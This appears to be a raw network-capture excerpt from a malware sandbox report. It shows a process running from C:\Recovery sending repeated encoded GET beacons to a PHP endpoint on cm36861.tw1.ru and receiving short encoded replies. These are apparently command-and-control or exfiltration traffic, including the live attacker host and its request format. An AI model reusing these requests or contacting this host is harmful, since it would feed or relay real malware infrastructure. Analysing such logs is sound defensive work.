Oct 24, 2024 13:58:25.014847040 CEST	2161	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:25.908720970 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49992	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:30.923820019 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:31.816162109 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49993	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:36.830446959 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:37.734261990 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49994	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:42.754949093 CEST	2161	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=d1nIiojIiRWO1gjNhlTZklzYldTNiRTO5kjNzUmZhN2N1cjYlljIsICMmRGMhhzMxMDOygTZlRGN2ETYlN2M3MjMjJTO0UzNlFTNmRTM2UWOiojI0MWYiJmNycDO1EDOlVDO0IzN1cTYwYTNhZWZ5AzM2UmIsICZ1MDOkNzMyY2NyIzYiVmMkVjN2UjZ2UGZhBzNkNWYwUGM0AjYxgzYiojIwImMlJmYiNzM5YGNilzMiJzNilDN3cDMjZDZkZDMkljI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETpRzVkNlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS1R2MiVHdtJmVKl2TpV1Vih [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:43.655886889 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49995	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:48.907686949 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:49.795442104 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49996	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:58:54.811670065 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:58:55.695616007 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:58:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49997	92.53.106.114	80	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:59:00.717962027 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
Oct 24, 2024 13:59:01.602400064 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:59:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.5	49998	92.53.106.114	80

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:59:06.626573086 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:59:07.525536060 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:59:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.5	49999	92.53.106.114	80

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:59:12.546520948 CEST	2159	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru
